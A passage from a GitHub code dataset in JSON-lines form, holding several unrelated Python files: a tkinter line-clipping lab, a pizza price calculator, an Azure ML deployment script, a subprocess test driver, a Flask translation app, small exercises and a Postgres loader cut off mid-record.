горизонтальный\n\n for i in range(4):\n dot1_bits = get_dot_bits(rect, dot1)\n dot2_bits = get_dot_bits(rect, dot2)\n\n vision = check_visible(dot1_bits, dot2_bits)\n\n if (vision == -1):\n return # выйти и не рисовать\n elif (vision == 1):\n break # нарисовать и выйти\n\n if (are_bits_equal(dot1_bits, dot2_bits, i)):\n continue\n\n if get_bit(dot1_bits, i) == 0:\n tmp = dot1\n dot1 = dot2\n dot2 = tmp\n\n if (fl != -1):\n if (i < 2):\n dot1[Y_DOT] = m * (rect[i] - dot1[X_DOT]) + dot1[Y_DOT]\n dot1[X_DOT] = rect[i]\n continue\n else:\n dot1[X_DOT] = (1 / m) * (rect[i] - dot1[Y_DOT]) + dot1[X_DOT]\n\n dot1[Y_DOT] = rect[i]\n\n res_color = parse_color(option_color_cut_line.get())\n\n canvas_win.create_line(dot1[X_DOT], dot1[Y_DOT], dot2[X_DOT], dot2[Y_DOT], fill = res_color)\n \n\ndef cut_area():\n global rect\n\n if (rect[0] == -1):\n messagebox.showinfo(\"Ошибка\", \"Не задан отсекатель\")\n\n rect = [min(rect[0], rect[1]), max(rect[0], rect[1]), max(rect[2], rect[3]), min(rect[2], rect[3])]\n\n canvas_win.create_rectangle(rect[X_MIN] + 1, rect[Y_MAX] + 1, rect[X_MAX] - 1, rect[Y_MIN] - 1, fill = \"white\", outline = \"white\")\n \n for line in lines:\n if (line):\n method_sazerland_kohen(rect, line)\n\n\n\n\nif __name__ == \"__main__\":\n '''\n Основной графический модуль\n '''\n\n win = Tk()\n win['bg'] = WIN_COLOR\n win.geometry(\"%dx%d\" %(WIN_WIDTH, WIN_HEIGHT))\n win.title(\"Лабораторная работа #7 (Цветков И.А. ИУ7-43Б)\")\n win.resizable(False, False)\n\n canvas_win = Canvas(win, width = CV_WIDE, height = CV_HEIGHT, bg = CV_COLOR)\n canvas_win.place(x = 0, y = 0)\n\n # Binds\n\n lines = [[]]\n canvas_win.bind(\"<3>\", add_line_click)\n\n rect = [-1, -1, -1, -1]\n canvas_win.bind(\"<1>\", add_rect_click1)\n canvas_win.bind('', add_rect_click)\n \n canvas_win.bind('LeftCtrl', add_vert_horiz_lines)\n\n # Add cutter\n\n back_box = Label(text = \"\", font=\"-family {Consolas} -size 16\", width = 43, height = 6, bg = BOX_COLOR)\n back_box.place(x = CV_WIDE + 20, y = 10)\n\n cutter_text = Label(win, text = \"Координаты отсекателя\", width = 43, font=\"-family {Consolas} -size 16\", bg = MAIN_TEXT_COLOR)\n cutter_text.place(x = CV_WIDE + 20, y = 10)\n\n xleft_cutter_text = Label(text = \"Левый верхний x: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n xleft_cutter_text.place(x = CV_WIDE + 20, y = 50)\n\n xleft_cutter_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n xleft_cutter_entry.place(x = CV_WIDE + 210, y = 50)\n\n yleft_cutter_text = Label(text = \"y: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n yleft_cutter_text.place(x = CV_WIDE + 360, y = 50)\n\n yleft_cutter_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n yleft_cutter_entry.place(x = CV_WIDE + 390, y = 50)\n\n\n xright_cutter_text = Label(text = \"Правый нижний x: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n xright_cutter_text.place(x = CV_WIDE + 20, y = 90)\n\n xright_cutter_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n xright_cutter_entry.place(x = CV_WIDE + 210, y = 90)\n\n yright_cutter_text = Label(text = \"y: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n yright_cutter_text.place(x = CV_WIDE + 360, y = 90)\n\n yright_cutter_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n yright_cutter_entry.place(x = CV_WIDE + 390, y = 90)\n\n\n add_cutter_btn = Button(win, text = \"Нарисовать отсекатель\", font=\"-family {Consolas} -size 14\", command = lambda: add_rect())\n add_cutter_btn.place(x = CV_WIDE + 170, y = 130)\n\n\n # Add line\n\n back_box = Label(text = \"\", font=\"-family {Consolas} -size 16\", width = 43, height = 6, bg = BOX_COLOR)\n back_box.place(x = CV_WIDE + 20, y = 190)\n\n cutter_text = Label(win, text = \"Добавить отрезок\", width = 43, font=\"-family {Consolas} -size 16\", bg = MAIN_TEXT_COLOR)\n cutter_text.place(x = CV_WIDE + 20, y = 190)\n\n\n x_start_line_text = Label(text = \"Начало x: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n x_start_line_text.place(x = CV_WIDE + 20, y = 230)\n\n x_start_line_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n x_start_line_entry.place(x = CV_WIDE + 130, y = 230)\n\n y_start_line_text = Label(text = \"y: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n y_start_line_text.place(x = CV_WIDE + 360, y = 230)\n\n y_start_line_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n y_start_line_entry.place(x = CV_WIDE + 390, y = 230)\n\n\n x_end_line_text = Label(text = \"Конец x: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n x_end_line_text.place(x = CV_WIDE + 20, y = 270)\n\n x_end_line_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n x_end_line_entry.place(x = CV_WIDE + 130, y = 270)\n\n y_end_line_text = Label(text = \"y: \", font=\"-family {Consolas} -size 14\", bg = BOX_COLOR)\n y_end_line_text.place(x = CV_WIDE + 360, y = 270)\n\n y_end_line_entry = Entry(font=\"-family {Consolas} -size 14\", width = 9)\n y_end_line_entry.place(x = CV_WIDE + 390, y = 270)\n\n\n add_line_btn = Button(win, text = \"Нарисовать отрезок\", font=\"-family {Consolas} -size 14\", command = lambda: add_line())\n add_line_btn.place(x = CV_WIDE + 190, y = 305)\n\n\n # TODO Choose cutter color \n\n back_box_filling = Label(text = \"\", font=\"-family {Consolas} -size 16\", width = 43, height = 4, bg = BOX_COLOR)\n back_box_filling.place(x = CV_WIDE + 20, y = 375)\n\n color_text = Label(win, text = \"Выбрать цвет отсекателя\", width = 43, font=\"-family {Consolas} -size 16\", bg = MAIN_TEXT_COLOR)\n color_text.place(x = CV_WIDE + 20, y = 375)\n\n option_color_cutter = IntVar()\n option_color_cutter.set(1)\n\n color_cutter_orange = Radiobutton(text = \"Оранжевый\", font=\"-family {Consolas} -size 14\", variable = option_color_cutter, value = 1, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cutter_orange.place(x = CV_WIDE + 25, y = 405)\n\n color_cutter_red = Radiobutton(text = \"Красный\", font=\"-family {Consolas} -size 14\", variable = option_color_cutter, value = 2, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cutter_red.place(x = CV_WIDE + 400, y = 405)\n\n color_cutter_blue = Radiobutton(text = \"Синий\", font=\"-family {Consolas} -size 14\", variable = option_color_cutter, value = 3, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cutter_blue.place(x = CV_WIDE + 25, y = 445)\n\n color_cutter_green = Radiobutton(text = \"Зеленый\", font=\"-family {Consolas} -size 14\", variable = option_color_cutter, value = 4, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cutter_green.place(x = CV_WIDE + 400, y = 445)\n\n\n # TODO Choose line color \n\n back_box_filling = Label(text = \"\", font=\"-family {Consolas} -size 16\", width = 43, height = 4, bg = BOX_COLOR)\n back_box_filling.place(x = CV_WIDE + 20, y = 495)\n\n color_text = Label(win, text = \"Выбрать цвет отрезка\", width = 43, font=\"-family {Consolas} -size 16\", bg = MAIN_TEXT_COLOR)\n color_text.place(x = CV_WIDE + 20, y = 495)\n\n option_color_line = IntVar()\n option_color_line.set(3)\n\n color_line_orange = Radiobutton(text = \"Оранжевый\", font=\"-family {Consolas} -size 14\", variable = option_color_line, value = 1, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_line_orange.place(x = CV_WIDE + 25, y = 535)\n\n color_line_red = Radiobutton(text = \"Красный\", font=\"-family {Consolas} -size 14\", variable = option_color_line, value = 2, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_line_red.place(x = CV_WIDE + 400, y = 535)\n\n color_line_blue = Radiobutton(text = \"Синий\", font=\"-family {Consolas} -size 14\", variable = option_color_line, value = 3, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_line_blue.place(x = CV_WIDE + 25, y = 565)\n\n color_line_green = Radiobutton(text = \"Зеленый\", font=\"-family {Consolas} -size 14\", variable = option_color_line, value = 4, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_line_green.place(x = CV_WIDE + 400, y = 565)\n\n\n # TODO Choose cut line color \n\n back_box_filling = Label(text = \"\", font=\"-family {Consolas} -size 16\", width = 43, height = 4, bg = BOX_COLOR)\n back_box_filling.place(x = CV_WIDE + 20, y = 615)\n\n color_text = Label(win, text = \"Выбрать цвет результата\", width = 43, font=\"-family {Consolas} -size 16\", bg = MAIN_TEXT_COLOR)\n color_text.place(x = CV_WIDE + 20, y = 615)\n\n option_color_cut_line = IntVar()\n option_color_cut_line.set(4)\n\n color_cut_line_orange = Radiobutton(text = \"Оранжевый\", font=\"-family {Consolas} -size 14\", variable = option_color_cut_line, value = 1, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cut_line_orange.place(x = CV_WIDE + 25, y = 655)\n\n color_cut_line_red = Radiobutton(text = \"Красный\", font=\"-family {Consolas} -size 14\", variable = option_color_cut_line, value = 2, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cut_line_red.place(x = CV_WIDE + 400, y = 655)\n\n color_cut_line_blue = Radiobutton(text = \"Синий\", font=\"-family {Consolas} -size 14\", variable = option_color_cut_line, value = 3, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cut_line_blue.place(x = CV_WIDE + 25, y = 685)\n\n color_cut_line_green = Radiobutton(text = \"Зеленый\", font=\"-family {Consolas} -size 14\", variable = option_color_cut_line, value = 4, bg = BOX_COLOR, activebackground = BOX_COLOR, highlightbackground = BOX_COLOR)\n color_cut_line_green.place(x = CV_WIDE + 400, y = 685)\n\n\n add_vert_horiz_lines_btn = Button(win, text = \"Добавить вертикальный и\\nгоризонтальный отрезки\", width = 35, height = 2, font=\"-family {Consolas} -size 14\", command = lambda: add_vert_horiz_lines())\n add_vert_horiz_lines_btn.place(x = CV_WIDE + 100, y = 750)\n\n cut_btn = Button(win, text = \"Отсечь\", width = 18, height = 2, font=\"-family {Consolas} -size 14\", command = lambda: cut_area())\n cut_btn.place(x = CV_WIDE + 20, y = 830)\n\n clear_btn = Button(win, text = \"Очистить экран\", width = 18, height = 2, font=\"-family {Consolas} -size 14\", command = lambda: reboot_prog())\n clear_btn.place(x = CV_WIDE + 350, y = 830)\n\n\n\n win.mainloop()","repo_name":"amunra2/cg-bmstu-iu7","sub_path":"lab_07/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17674,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"6501107045","text":"#!/usr/bin/env python3\n\n# Created by: Michael Clermont\n# Created on: Feb 2022\n# This program calculates the price of a pizza\n# with diameter inputted by the user and HST\n\nimport constants\n\n\ndef main():\n # this function calculates the circumference\n\n # input\n diameter = float(input(\"Enter the diameter of the pizza (inch): \"))\n\n # process\n pizza_price = (\n constants.LABOR + constants.RENT + (diameter * constants.COST_PER_INCH)\n )\n total = pizza_price + (pizza_price * constants.HST)\n\n # output\n print(\"\")\n print(\"The cost for a {0} inch pizza is: ${1:,.2f}\".format(diameter, total))\n print(\"\\nDone.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"michael-clermont1/ICS3U-Unit2-04-Python","sub_path":"pizza_diameter.py","file_name":"pizza_diameter.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3850746883","text":"\"\"\"\nFunctions to deploy service\n(RELEASE pipeline)\n\nTo run locally, use:\n> cd ./root\n> conda activate nlp\n> python deploy/service.py --project_name msforum_en --do_deploy\n\"\"\"\nimport os\nimport json\nimport shutil\nimport logging\nimport argparse\n\nfrom azureml.core import Workspace, Experiment, Model, Webservice\nfrom azureml.core.authentication import InteractiveLoginAuthentication\nfrom azureml.core.resource_configuration import ResourceConfiguration\nfrom azureml.core.webservice import AciWebservice, AksWebservice\nfrom azureml.core import Environment\nfrom azureml.core.conda_dependencies import CondaDependencies\nfrom azureml.core.model import InferenceConfig\nfrom azureml.exceptions import WebserviceException\n\n# Custom Functions\nimport sys \nsys.path.append('./src')\nimport helper as he\n\n############################################\n##### Parameters\n############################################\n\n## Arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--project_name\", \n default='msforum_en',\n type=str)\nparser.add_argument('--do_deploy',\n action='store_true')\nparser.add_argument('--show_output',\n action='store_true')\nargs = parser.parse_args()\n\n## Load \nparams = he.get_project_config(f'{args.project_name}.config.json')\nlanguage = params.get('language')\nenv = params.get('environment')\n\n############################################\n##### AML Setup\n############################################\n\n## Workspace\nws = he.get_aml_ws()\n\n# Python dependencies\npip_packages=he.get_requirements(req_type='deploy')\n\n## Local Config\nfn_config_infer = 'config.json'\nshutil.copy(f'./project/{args.project_name}.config.json', f'./src/{fn_config_infer}')\n\nscript_folder = \".\"\ntasks = params.get(\"tasks\")\ndeploy = params.get(\"deploy\")\n\n############################################\n##### DEPLOY\n############################################\n\nversion = '0.2'\nauth_enabled = True\n\nif args.do_deploy:\n logging.warning(f'[INFO] Running deploy for {args.project_name}')\n # Fetch Models\n models = []\n for task in tasks:\n model_name = f'{args.project_name}-model-{task}'\n if tasks.get(task)['type'] in ['ner', 'om']: \n # NOTE: tasks 3 and 5 do not have a model\n continue\n model = Model(ws, model_name)\n models.append(\n model\n )\n logging.warning(f'[INFO] Added Model : {model.name} (v{model.version})')\n \n # Deployment Target\n if deploy.get('type') == 'ACI':\n compute_config = AciWebservice.deploy_configuration(cpu_cores=deploy.get('cpu'), memory_gb=deploy.get('memory'), auth_enabled=auth_enabled) #2\n elif deploy.get('type') == 'AKS':\n compute_config = AksWebservice.deploy_configuration()\n \n # Prepare Environment\n environment = Environment('env')\n conda_packages = ['pytorch', 'torchvision']\n pip_packages = ['azureml-defaults'] + pip_packages\n environment.python.conda_dependencies = CondaDependencies.create(pip_packages=pip_packages,\n conda_packages=conda_packages)\n\n inference_config = InferenceConfig(entry_script='src/infer.py',\n source_directory='.',\n environment=environment)\n \n # Create or update service\n service_name = f'{args.project_name}-{env}'.replace('_','-')\n ## Create web service\n service = Model.deploy(workspace=ws, \n name=service_name, \n models=models, \n inference_config=inference_config, \n deployment_config=compute_config, \n overwrite=True)\n logging.warning('[INFO] Creating web service')\n service.wait_for_deployment(show_output=args.show_output)\n\n # Get service details\n logging.warning(service.get_keys)\n\n # Test service\n try:\n service.run(json.dumps([{\"body\": \"Mein Windows Vista rechner will nicht mehr - ich kriege dauernd fehler meldungen. Ich wollte mir eh einen neuen kaufen, aber ich hab kein Geld. Kann Bill Gates mir helfen?\"}]))\n logging.warning(f'[SUCCESS] Service was deployed.')\n except Exception as e:\n logging.warning(f'[ERROR] Service was not deployed as expected. {e}')\n\n#Remove temp config\nos.remove( f'./src/{fn_config_infer}')","repo_name":"microsoft/verseagility","sub_path":"deploy/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"44"} +{"seq_id":"28867111867","text":"# testy__driver.py\n\nimport subprocess\nimport sys\n\n\n\ndef run_command__popen(command, communicate_string = None):\n\tp = subprocess.Popen(command, \n\t\tshell=True,\n\t\tstdin=subprocess.PIPE,\n\t\tstdout=subprocess.PIPE,\n\t\tstderr=subprocess.PIPE)\n\n\tp_status = None\n\n\tif communicate_string != None:\n\t\tprint(\"Calling communicate etc\")\n\t\t# get ret code of None if we don't do this\n\t\t# (stdout_data, stderr_data) = p.communicate(b\"alex\\nhuns\")\n\t\t(stdout_data, stderr_data) = p.communicate(b\"a.nice.key\\nThe value\\nf\\ny\")\n\n\t\t# SO suggestion instead of p.returncode. Still get 1.\n\t\tp_status = p.wait()\n\telse:\n\t\tp_status = p.wait()\n\n\t# print(f\"============ stdout looks like: {stdout_data}\")\n\n\n\t# stdoutdata, stderrdata = process.communicate()\n\t# print process.returncode\n\n\t# None means the process didn't terminate yet!\n\tprint(f\"RET CODE: {p.returncode} {p_status}\")\n\n\n# THIS WORKS\n# 'run' is preferred to 'check_output', according to https://stackoverflow.com/a/55758810\n# use 'input' param for the stdin content\ndef run_command__run(command, input_strings = None):\n\tprint(f\"\\n==================== calling run_command with command: {command} input: {input_strings}\")\n\t# output = subprocess.check_output(command, shell=True))\n\n\tcompleted_process = subprocess.run(command, input=input_strings, shell=True)\n\n\tprint(f\"completedProcess = {completed_process}\")\n\n\t# try:\n\t# output = subprocess.check_output(command, shell=True) \n\t# except subprocess.CalledProcessError as grepexc: \n\t# print(f\"error code {grepexc.returncode} output: {grepexc.output}\")\n\n\n\n# we get 127, i.e. -1, if communicate gives input not recognised, i.e. script doesn't exit\n# run_command__popen(\"testy_no_input_ret_0.py\")\n\n# so these both work\nrun_command__run(\"python3 testy_no_input_ret_0.py\")\nrun_command__run(\"python3 testy_no_input_ret_1.py\")\n\nrun_command__run(\"python3 testy_take_input_ret_0.py\", b\"alex\\nhunsley\\n\")\nrun_command__run(\"python3 testy_take_input_ret_1.py\", b\"alex\\nhunsley\\n\")\n\n# incomplete input test - bombs out with code 1 due to finding EOF in input\n# run_command__run(\"python3 testy_take_input_ret_1.py\", b\"alex\\n\")\n","repo_name":"alexhunsley/blackbox-command-tester","sub_path":"subprocess_spike/testy__driver.py","file_name":"testy__driver.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22962349539","text":"import re\nimport os\n\nimport numpy as np\n\nfile='D:/work2/cc.log'\nwith open(file,mode='r',encoding='UTF-8') as f:\n lines=str(f.readlines())\n pattern1 = re.compile('总花费为:(\\d+)')\n pattern2 = re.compile('总奖金为:(\\d+)')\n pattern3 = re.compile('回报率为:(\\d+.?\\d+)')\n m1 = re.findall(pattern1,lines)\n m2 = re.findall(pattern2,lines)\n m3 = re.findall(pattern3,lines)\n m1 = list(map(int, m1))\n m2 = list(map(int, m2))\n m3 = list(map(float, m3))\n total_m1=sum(m1)\n total_m2=sum(m2)\n syl=round(total_m2/total_m1*100,2)\n print('总奖金为:%s,总花费为:%s,收益率为:%s%%'%(total_m2,total_m1,syl))\n\n arr = np.array(m3)\n arr1 = arr[arr >= syl]\n arr2 = arr1[ (arr1 >= 1300) & (arr1 <= 1550)]\n arr3 = arr1[ arr1 > 1550]\n sec = len(arr2)\n fir = len(arr3)\n #print(sorted(arr1))\n print('截至目前二等奖的数量为:%s,一等奖的数量为:%s'%(sec,fir))","repo_name":"QingFengLanYue/learn_python","sub_path":"ceshi/dealLog.py","file_name":"dealLog.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12602303940","text":"#\n# @lc app=leetcode.cn id=203 lang=python3\n#\n# [203] 移除链表元素\n#\n# https://leetcode-cn.com/problems/remove-linked-list-elements/description/\n#\n# algorithms\n# Easy (38.99%)\n# Total Accepted: 18.8K\n# Total Submissions: 47.3K\n# Testcase Example: '[1,2,6,3,4,5,6]\\n6'\n#\n# 删除链表中等于给定值 val 的所有节点。\n#\n# 示例:\n#\n# 输入: 1->2->6->3->4->5->6, val = 6\n# 输出: 1->2->3->4->5\n#\n#\n#\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nfrom comm import *\n# @lc code=start\n\nclass Solution(object):\n def removeElements(self, head, val):\n \"\"\"\n :type head: ListNode\n :type val: int\n :rtype: ListNode\n \"\"\"\n if not head:\n return\n new_head = ptr = ListNode(None)\n new_head.next = head\n while ptr.next:\n if ptr.next.val == val:\n ptr.next = ptr.next.next\n else:\n ptr = ptr.next\n return new_head.next\n\n# @lc code=end\n\n","repo_name":"ruanimal/vscode-leetcode-cn","sub_path":"203.移除链表元素.py","file_name":"203.移除链表元素.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41465194341","text":"from google_trans_new import google_translator\nfrom flask import Flask, request, jsonify, render_template, send_from_directory, url_for\nfrom gtts import gTTS\nfrom langdetect import detect, DetectorFactory\n\n# from flask_restful import Api, Resource, reqparse\n\n\napp = Flask(__name__)\n# API = Api(app)\n\n\n# class Translator(Resource):\n# @staticmethod\n# def post():\n# parser = reqparse.RequestParser()\n# parser.add_argument('text', default='')\n\n# args = parser.parse_args() # dict\n\n# sentence = args['text']\n\n# translator = google_translator()\n# trans_sentence = translator.translate(sentence, lang_tgt='vi')\n\n# # print(trans_sentence)\n\n# output = {'translated_text': trans_sentence}\n\n# return output, 200\n\n\n# API.add_resource(Translator, '/translate')\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/translate', methods=['POST'])\ndef translate():\n data = request.get_json(force=True)\n sentence = data['text']\n\n translator = google_translator()\n trans_sentence = translator.translate(sentence, lang_tgt='vi')\n\n # print(trans_sentence)\n\n output = {'translated_text': trans_sentence}\n\n return jsonify(output)\n\n\n@app.route('/speak', methods=['POST'])\ndef speak():\n data = request.get_json(force=True)\n sentence = data['text']\n filename = data['name'] + '.mp3'\n robot = gTTS(sentence, lang='vi', tld='com.vn')\n robot.save('tmp/' + filename)\n\n output = {\n \"url\": url_for('speak_file', filename=filename)\n }\n\n return jsonify(output)\n\n\n@app.route('/detect', methods=['POST'])\ndef detect_language():\n data = request.get_json(force=True)\n sentence = data['text']\n\n DetectorFactory.seed = 0\n output = {\"lang\": detect(sentence)}\n\n return jsonify(output)\n\n\n@app.route('/speak_files/')\ndef speak_file(filename):\n return send_from_directory('tmp', filename)\n\n\nif __name__ == '__main__':\n app.run(debug=True, use_reloader=True)\n","repo_name":"minhanh29/my_first_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40362329397","text":"import operator\n\n#Using the format function\nname = \"Julie\"\nage = \"42\"\n\nsentence = \"Hi my name is {} and I am {} years old\".format(name,age)\nprint(sentence)\n\n#manipulation\nfirst100Characters = sentence[:100] \n\n#\n\n#If else statement\nyear = 1830\nif year < 2100 and year > 2000:\n print(\"Welcome to the 21st century!\")\nelse:\n print(\"You are before or after the 21st century\")\n#\n\n#functions\ndef trippleprint(s):\n print(s+s+s)\n#\n\n#lists\nshoes = [\"Spizikes\",\"Air Force 1\",\"Curry 2\",\"Melo 5\"]\n#\n\n#loops\nnumbers = [76, 83, 16, 69, 52, 78, 10, 77, 45, 52, 32, 17, 58, 54, 79, 72, 55, 50, 81, 74, 45, 33, 38, 10, 40, 44, 70, 81, 79, 28, 83, 41, 14, 16, 27, 38, 20, 84, 24, 50, 59, 71, 1, 13, 56, 91, 29, 54, 65, 23, 60, 57, 13, 39, 58, 94, 94, 42, 46, 58, 59, 29, 69, 60, 83, 9, 83, 5, 64, 70, 55, 89, 67, 89, 70, 8, 90, 17, 48, 17, 94, 18, 98, 72, 96, 26, 13, 7, 58, 67, 38, 48, 43, 98, 65, 8, 74, 44, 92]\n\nfor num in numbers:\n if(num > 90):\n print(num)\n#\n\n#dictionary\nwords = [\"PoGo\",\"Spange\",\"Lie-Fi\"]\ndefinitions = [\"Slang for Pokemon Go\",\"To collect spare change, either from couches, passerbys on the street or any numerous other ways and means\",\"When your phone or tablet indicates that you are connected to a wireless network, however you are still unable to load webpages or use any internet services with your device\"]\n\ncooldictionary = dict(zip(words, definitions))\nprint(cooldictionary)\n#\n\n#Class\n#Something weird is classes can have extra variables that do not exist in the actual definition. So we could say\n#car c = Car(2018, \"chevy\", \"cobalt\")\n#c.tireCondition = new;\nclass Car:\n def __init__(self,year, make, model):\n self.year = year\n self.make = make\n self.model = model\n \n def age(self):\n return 2018 - self.year\n#\n\n#Helper Functions\n#length\nstringTest = \"ThisIsAtest\"\nlen(stringTest) #12\n\n#split\nstringTest2 = \"This Is A Sentence\" #\nstring2Words = stringTest2.split() #[This, Is, A, Test]\nstring2Length = len(string2Words) #4\n\n#sorting\n#What is operator? You need to 'import operator' at the top of the app\ntestDict = {}\nsorted(testDict.items(), key = operator.itemgetter(1), reverse=True)\n\n\n#","repo_name":"13igg/PythonPractice","sub_path":"Intro/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72769763332","text":"from .utils import *\n\ndef OUNoise(parclass):\n \"\"\"Requires parent class, inherited from Agent.\"\"\"\n \n class OUNoise(parclass):\n \"\"\"\n Ornstein-Uhlenbeck noise process.\n \n Args:\n OU_mu - float\n OU_theta - float\n OU_sigma - float\n \"\"\"\n __doc__ += parclass.__doc__\n PARAMS = parclass.PARAMS | {\"OU_mu\", \"OU_theta\", \"OU_sigma\"} \n \n def __init__(self, config):\n super().__init__(config)\n \n self.config.setdefault(\"OU_mu\", 0)\n self.config.setdefault(\"OU_theta\", 0.15)\n self.config.setdefault(\"OU_sigma\", 0.2)\n \n self.noise = self.config.OU_mu * np.ones(self.config.num_actions)\n\n def act(self, state):\n a = super().act(state, record)\n if self.is_learning:\n self.noise += self.config.OU_theta * (self.config.OU_mu - self.noise) + self.config.OU_sigma * np.random.normal(size=self.config.num_actions)\n return a + self.noise\n return a\n return OUNoise\n","repo_name":"FortsAndMills/Learning-Reinforcement-Learning","sub_path":"LRL/OUNoise.py","file_name":"OUNoise.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"44"} +{"seq_id":"35593325237","text":"import psycopg2\nfrom psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT\nimport sys\nimport json\nimport os\nimport utils\nimport logging\n\ndef get_connection():\n try:\n if \"DATABASE_CERT\" in os.environ:\n with open(\"./cert.pem\",'w') as cert_file:\n cert_file.write(os.environ[\"DATABASE_CERT\"])\n os.environ[\"PGSSLROOTCERT\"] = \"./cert.pem\"\n conn = psycopg2.connect(user=os.environ[\"PG_USER\"], host=os.environ[\"PG_HOST\"], password=os.environ[\"PG_PASSWORD\"], port=os.environ[\"PG_PORT\"], sslmode=\"verify-full\", dbname=os.environ[\"PG_DB\"])\n else:\n conn = psycopg2.connect(user=os.environ[\"PG_USER\"], host=os.environ[\"PG_HOST\"], password=os.environ[\"PG_PASSWORD\"], port=os.environ[\"PG_PORT\"])\n conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n cur = conn.cursor()\n cur.execute(\"CREATE DATABASE beetravels;\")\n logging.debug(\"create beetravels database\")\n cur.close()\n conn.close()\n except Exception as e:\n logging.warning(\"Error: Unable to create to the database\")\n logging.info(e)\n\n try:\n if \"DATABASE_CERT\" in os.environ:\n conn = psycopg2.connect(user=os.environ[\"PG_USER\"], host=os.environ[\"PG_HOST\"], password=os.environ[\"PG_PASSWORD\"], port=os.environ[\"PG_PORT\"], sslmode=\"verify-full\", database=\"beetravels\")\n else:\n conn = psycopg2.connect(user=os.environ[\"PG_USER\"], host=os.environ[\"PG_HOST\"], password=os.environ[\"PG_PASSWORD\"], port=os.environ[\"PG_PORT\"], database=\"beetravels\")\n conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n return conn\n except Exception as e:\n logging.warning(\"Error: Unable to connect to the database\")\n logging.info(e)\n exit(e)\n\ndef drop_table(cursor, table_name):\n try:\n cursor.execute(\"\"\"\n DROP TABLE %s;\n \"\"\" % table_name)\n logging.info(\"dropped table \"+table_name)\n except Exception as e:\n logging.warning(\"drop unsuccessful\")\n logging.info(e)\n\ndef populate_postgres(data, info):\n conn = get_connection()\n cur = conn.cursor()\n\n drop_table(cur, \"cars\")\n drop_table(cur, \"car_info\")\n \n try:\n logging.info(\"creating car info DB\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS CAR_INFO (\n ID VARCHAR(255) PRIMARY KEY NOT NULL,\n NAME VARCHAR(255) NOT NULL,\n BODY_TYPE VARCHAR(255) NOT NULL,\n STYLE VARCHAR(255) NOT NULL,\n IMAGE VARCHAR(255) NOT NULL\n ); \n \"\"\")\n logging.info(\"writing to car info DB\")\n cur.executemany(\"\"\"\n INSERT INTO car_info VALUES (%(id)s, %(name)s, %(body_type)s, %(style)s, %(image)s);\n \"\"\", info)\n\n logging.info(\"creating car DB\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS CARS (\n ID VARCHAR(255) PRIMARY KEY NOT NULL,\n CAR_ID VARCHAR(255) REFERENCES car_info(id),\n CITY VARCHAR(255) NOT NULL,\n COUNTRY VARCHAR(255) NOT NULL,\n RENTAL_COMPANY VARCHAR(255) NOT NULL,\n COST DECIMAL NOT NULL\n );\n \"\"\")\n\n logging.info(\"writing to car DB\")\n cur.executemany(\"\"\"\n INSERT INTO cars VALUES (%(id)s, 